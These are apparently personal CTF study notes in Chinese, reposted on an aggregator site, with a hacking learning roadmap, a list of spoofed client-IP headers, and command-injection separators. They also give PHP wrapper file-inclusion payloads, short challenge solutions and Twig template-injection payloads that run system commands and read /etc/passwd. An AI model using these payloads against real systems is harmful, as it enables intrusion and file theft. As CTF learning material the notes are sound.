ctf笔记

news/2025/11/10 12:58:28/文章来源:https://www.cnblogs.com/xuxu22/p/19206704

黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
常用的网址
1 Client-IP:127.0.0.1
2 Forwarded-For-Ip: 127.0.0.1
3 Forwarded-For: 127.0.0.1
4 Forwarded-For: localhost
5 Forwarded:127.0.0.1
6 Forwarded: localhost
7 True-Client-IP:127.0.0.1
8 X-Client-IP: 127.0.0.1
9 X-Custom-IP-Authorization : 127.0.0.1
10 X-Forward-For: 127.0.0.1
11 X-Forward: 127.0.0.1
12 X-Forward: localhost
13 X-Forwarded-By:127.0.0.1
14 X-Forwarded-By: localhost
15 X-Forwarded-For-Original: 127.0.0.1
16 X-Forwarded-For-original: localhost
17 X-Forwarded-For: 127.0.0.1
18 X-Forwarded-For: localhost
19 X-Forwarded-Server: 127.0.0.1
20 X-Forwarded-Server: localhost
21 X-Forwarded: 127.0.0.1
22 X-Forwarded: localhost
23 X-Forwared-Host: 127.0.0.1
24 X-Forwared-Host: localhost
25 X-Host: 127.0.0.1
26 X-Host: localhost
27 X-HTTP-Host-Override : 127.0.0.1
28 X-Originating-IP: 127.0.0.1
29 X-Real-IP: 127.0.0.1
30 X-Remote-Addr: 127.0.0.1
31 X-Remote-Addr : localhost
32 X-Remote-IP: 127.0.0.1
看到ping命令就可以利用截断来执行新的命令。
首先测试所有的截断符号:
‘$’
‘;’
‘|’
‘-’
‘(’
‘)’
‘反引号’
‘||’
‘&&’
‘&’
‘}’
‘{’
'%0a’可以当作空格来用;

常用伪协议用法:
1.php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter
2.、data协议
用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
3.、file协议

原文链接:https://blog.csdn.net/Mr_helloword/article/details/107929653

1,web2攻防世界

编写脚本

2,fileclude攻防世界

代码审计
发现file1包含在里面
所以构造 file1=php://filter/read=convert.base64-encode/resource=flag.php 用来读取源码12行中文件flag.php中的语句~
其中php://filter/read=执行文件读取功能
convert.base64-encode执行Base64编码功能;
/resource=flag.php填写flag.php所在的目录~
编写 file2=php://input 表示访问语句
并且加上hello ctf用来进行访问
利用bp进行抓包,出现base64编码的一串字符
进行解码,即可出现flag
3,easyphp攻防世界
绕过 a 参数验证
思路:按照条件需要满足 intval($a) > 6000000 且 strlen($a) <= 3,可以利用 PHP 中科学计数法的特性来绕过长度限制同时满足整数大小要求。例如,在 PHP 中 9e9 这样的表示会被 intval 转换为 9000000000,符合大于 6000000 的条件,且字符串长度只有 3。
示例:在请求时传递参数 a=9e9 来尝试绕过该部分验证。
绕过 b 参数验证
思路:要使得 '8b184b' === substr(md5($b),-6,6) 成立,通过编写一个简单的暴力破解脚本去尝试大量不同的字符串,计算其 MD5 值并检查后 6 位是否符合要求。
示例脚本(Python 示例,用于生成符合要求的字符串,实际使用时可根据情况调整):
收起
python

import hashlib

for i in range(1000000):
s = str(i).encode('utf-8')
md5_value = hashlib.md5(s).hexdigest()
if md5_value[-6:] == '8b184b':
print(i)
break

运行上述脚本后,如果找到符合要求的字符串(假设找到的字符串是
test),则在请求时传递参数
b=test 去绕过这部分验证。

warmup
打开代码发现
source.php
发现源代码

发现 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
所以把hint.php加入URL发现flag not here, and flag in ffffllllaaaagggg
接着看有四个IF句
最后有是利用file传递,其中/../../../../为传递
构造?file=hint.php?/../../../../ffffllllaaaagggg
常用的twig的zhu
常用的twig的注入 ssti注入,那就进行ssti注入测试,payload:{{2*2}}
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{["id"]|map("system")|join(","){{{"
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/961292.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2025年热门的石墨铜套用户好评厂家排行

2025年热门的石墨铜套用户好评厂家排行行业背景与市场趋势随着工业4.0的深入推进和高端装备制造业的快速发展,自润滑轴承市场迎来了前所未有的增长机遇。根据《2024-2029年中国滑动轴承行业市场调研与投资前景预测报告…

【触想智能】工业平板电脑一体机在自助查询终端服务领域上的七大应用优势

工业平板电脑一体机在自助查询终端服务领域上的应用具有以下七大优势,总结如下:1、多功能查询服务:工业平板电脑一体机可以用于提供多种查询服务,例如自助购物、公共信息查询、机票/火车票查询、酒店预订等。它们可…

2025年评价高的硬质快速门品牌厂家排行榜

2025年评价高的硬质快速门品牌厂家排行榜行业背景与市场趋势随着中国制造业的快速发展和产业升级,硬质快速门作为工业厂房、物流仓储等领域的关键设备,市场需求持续增长。据中国工业门行业协会最新数据显示,2024年我…

补题若干(3)

[https://atcoder.jp/contests/abc400/tasks/abc400_e](埃氏筛法+二分) 题意: 给定\(q\)次查询,每次查询给出一个数\(n\),求最大的小于等于\(n\)的400数 400数:只有两个质因数,质因数次方为偶 思路: 400是两个质…

2025年知名的橡塑隔热棉TOP品牌厂家排行榜

2025年知名的橡塑隔热棉TOP品牌厂家排行榜橡塑隔热棉行业背景与市场趋势橡塑隔热棉作为一种高效节能的保温材料,近年来在建筑、工业、制冷等领域应用日益广泛。根据中国绝热节能材料协会最新发布的《2024-2025年中国保…

2025年热门的防爆工业门厂家最新实力排行

2025年热门的防爆工业门厂家最新实力排行行业背景与市场趋势随着工业4.0的深入推进和安全生产法规的日益严格,防爆工业门作为工业建筑安全防护的重要设施,市场需求持续增长。据中国工业门行业协会最新数据显示,2024…

2025年热门的扶手电梯高性价比产品推荐榜

2025年热门的扶手电梯高性价比产品推荐榜 行业背景与市场趋势 随着城市化进程的加速和商业综合体、交通枢纽、大型商超等公共设施的不断扩建,扶手电梯作为垂直交通的重要组成部分,市场需求持续增长。据《2024-2025…

2025年质量好的点胶AB胶管TOP实力厂家推荐榜

2025年质量好的点胶AB胶管TOP实力厂家推荐榜行业背景与市场趋势点胶AB胶作为工业制造领域的关键材料,近年来随着电子、汽车、新能源等行业的快速发展,市场需求持续增长。据《2024年中国胶粘剂行业白皮书》显示,2023…

2025年热门的全品类定制零角度铰链TOP实力厂家推荐榜

2025年热门的全品类定制零角度铰链TOP实力厂家推荐榜 行业背景与市场趋势 随着家居五金行业的快速发展,零角度铰链作为高端定制家居的核心配件,其市场需求持续增长。据《2024全球家居五金市场报告》显示,零角度铰…

2025年热门的面料工艺培训实操教学推荐榜单

2025年热门的面料工艺培训实操教学推荐榜单行业背景与市场趋势随着全球纺织产业向智能化、数字化方向转型,面料工艺培训市场迎来了前所未有的发展机遇。据中国纺织工业联合会最新数据显示,2024年中国纺织行业规模以上…

2025年知名的高质量保温杯厂家最新TOP实力排行

2025年知名的高质量保温杯厂家最新TOP实力排行 行业背景与市场趋势 随着健康生活理念的普及和消费升级,保温杯市场近年来持续增长。据《2025年中国杯壶行业白皮书》数据显示,全球保温杯市场规模已突破800亿元,中…

2025年质量好的煎炒不粘锅厂家推荐及选择指南

2025年质量好的煎炒不粘锅厂家推荐及选择指南行业背景与市场趋势随着中国家庭厨房消费升级,不粘锅市场近年来保持稳定增长。据中国五金制品协会2024年数据显示,国内不粘锅市场规模已达186亿元,年增长率维持在8.5%左…

2025年优质的履带式抛丸机最新TOP厂家排名

2025年优质的履带式抛丸机最新TOP厂家排名行业背景与市场趋势履带式抛丸机作为工业表面处理领域的关键设备,近年来随着制造业转型升级和环保要求提高,市场需求持续增长。据《2024-2025中国表面处理设备行业白皮书》显…

2025年口碑好的滚珠丝杆升降机行业内口碑厂家排行榜

2025年口碑好的滚珠丝杆升降机行业内口碑厂家排行榜行业背景与市场趋势滚珠丝杆升降机作为工业自动化领域的关键传动部件,近年来随着智能制造和工业4.0的推进,市场需求持续增长。据中国传动设备行业协会最新数据显示…

2025年口碑好的定制五金铰链厂家最新热销排行

2025年口碑好的定制五金铰链厂家最新热销排行行业背景与市场趋势五金铰链作为家具制造和建筑装饰领域的关键配件,其市场需求随着全球家具产业的持续增长而稳步上升。据中国五金制品协会最新数据显示,2024年全球五金铰…

2025年知名的草坪割草机厂家最新实力排行

2025年知名的草坪割草机厂家最新实力排行行业背景与市场趋势随着全球城市化进程加快和人们对生活品质要求的提升,园林绿化行业迎来了快速发展期。根据国际园林机械协会(ILMA)最新报告,2024年全球草坪割草机市场规模已…

【日记】没钱了(1086 字)

正文今天立冬,但是下雨。雨似乎已经下了很久了,几乎就没有放晴过呢。立冬,没有饺子,也没有羊肉汤。我忘了去年立冬是怎样过的了。似乎食堂里有羊肉汤来着,虽然不喜欢,但是很有要到冬天的氛围。今天不包晚饭,所以…

2025年靠谱的IXPE泡棉用户好评厂家排行

2025年靠谱的IXPE泡棉用户好评厂家排行:专业采购指南IXPE泡棉行业背景与市场趋势IXPE泡棉(交联聚乙烯泡棉)凭借其优异的环保性、缓冲性、隔音性、防水性等综合性能,近年来在汽车、电子、包装、建筑等领域应用迅速扩…

2025年质量好的三相电表箱厂家选购指南与推荐

2025年质量好的三相电表箱厂家选购指南与推荐行业背景与市场趋势随着我国电力行业的快速发展及智能电网建设的持续推进,三相电表箱作为电力计量与分配的关键设备,市场需求持续增长。据中国电力企业联合会最新数据显示…

2025年质量好的升降器厂家最新用户好评榜

2025年质量好的升降器厂家最新用户好评榜行业背景与市场趋势随着工业自动化水平的不断提升和智能制造需求的持续增长,升降器作为工业传动领域的关键设备,市场规模呈现稳定上升态势。据中国传动设备行业协会最新数据显…